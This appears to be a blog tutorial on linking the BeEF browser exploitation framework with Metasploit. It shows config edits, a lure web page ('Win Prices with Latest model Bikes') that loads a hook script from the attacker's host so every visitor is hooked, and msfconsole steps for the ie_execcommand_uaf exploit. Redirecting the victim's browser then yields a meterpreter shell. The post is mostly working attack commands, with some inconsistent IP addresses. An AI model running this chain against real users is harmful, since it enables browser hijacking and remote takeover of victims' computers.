BlogHeader

 

last post we getting started with BeEF of how to insert a Javascript link in a page and compromised a client browsers.

So the Browser Exploitation Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun.

 

But you will have no Metasploit Framework integration by default.

 

Let’s fix that, by editing first the /usr/share/beef-xss/config.yaml file. You should have something like this:
Obviously, we would like to change the metasploit part (line 20 and 21) to this:

 

 

#vi /usr/share/beef-xss/config.yaml

metasploit:

enable: true

 

Screenshot from 2014-07-08 16:25:29

 

Next, we will edit the /usr/share/beef-xss/extensions/metasploit/config.yaml file and change it to this:

So you need to edit the lines host:, callback_host: (and put your IP address there) and {os: ‘custom’, path: ”} (just paste the ‘/usr/share/metasploit-framework/’ for the path)

 

#vi /usr/share/beef-xss/extensions/metasploit/config.yaml

host: “192.168.31.20”

pass: “bhuvi”

callback_host: “192.168.31.20”

os: ‘custom’, path: ‘/usr/share/metasploit-framework’

 

Screenshot from 2014-07-08 16:29:10

 

Now, we are ready to start msfconsole, and load the msgrpc module like this:

#/etc/init.d/postgresql restart && /etc/init.d/metasploit restart

 

Screenshot from 2014-07-08 16:30:10

 

#msf> load msgrpc ServerHost=192.168.31.10 Pass=bhuvi

 

Screenshot from 2014-07-08 16:33:18

 

And now, we can start BeEF:

 

#cd /usr/share/beef-xss/
#./beef

Among the BeEF start-up messages, you should see something like:

[*] Successful connection with Metasploit.

[*] Loaded 232 Metasploit exploits.

 

Screenshot from 2014-07-08 16:34:42

Screenshot from 2014-07-08 16:37:37

 

For Testing we going to create a web html page with javascript hooked.

 

#vi /var/www/index.html

<html>
<head>
<title> Win Prices with Latest model Bikes. </title>
<script: src=”http://192.168.31.20:3000/hook.js”></script&gt;
</head>
<body>
<img src=”bike.jpg”/>
</body>
</html>

 

Screenshot from 2014-07-08 17:30:09

 

 

Downloaded bike.jpg form google and put it in /var/www directory.

 

Screenshot from 2014-07-08 23:12:27

 

Now when any client open the url http://192.168.31.20, the hook is set. Notice that the user does not have to run anything or mouse over anything for the attack to work. Just visiting the page triggers the attack.

 

Go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see the IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

 

Screenshot from 2014-07-08 17:32:42
Now it’s time to use metasploit, after getting complete control of the victims browser use the redirect command to listen on the metasploit connection.

 

#msfconsole

#msf > load msgrpc ServerHost=192.168.31.10 Pass=bhuvi

#msf > use exploit/windows/browser/ie_execcommand_uaf

#msf exploit(ie_execcommand_uaf) > show options

#msf exploit(ie_execcommand_uaf) > set SRVHOST 192.168.31.20

msf exploit(ie_execcommand_uaf) > set SRVPORT 8080

#msf exploit(ie_execcommand_uaf) > set URIPATH /

#msf exploit(ie_execcommand_uaf) > exploit

 

Screenshot from 2014-07-08 17:35:53

 

Now check out the BeEF control panel. In my case it’s http://192.168.31.20:3000/ui/panel and in command section click the redirect browser and enter the mestasploit listener http://192.168.31.2:8080.

 

Screenshot from 2014-07-09 20:54:25

 

 

Screenshot from 2014-07-09 20:54:44

 

Screenshot from 2014-07-09 20:58:52

 

Then it will get a meterpreter session….

 

Screenshot from 2014-07-09 21:34:49

Advertisements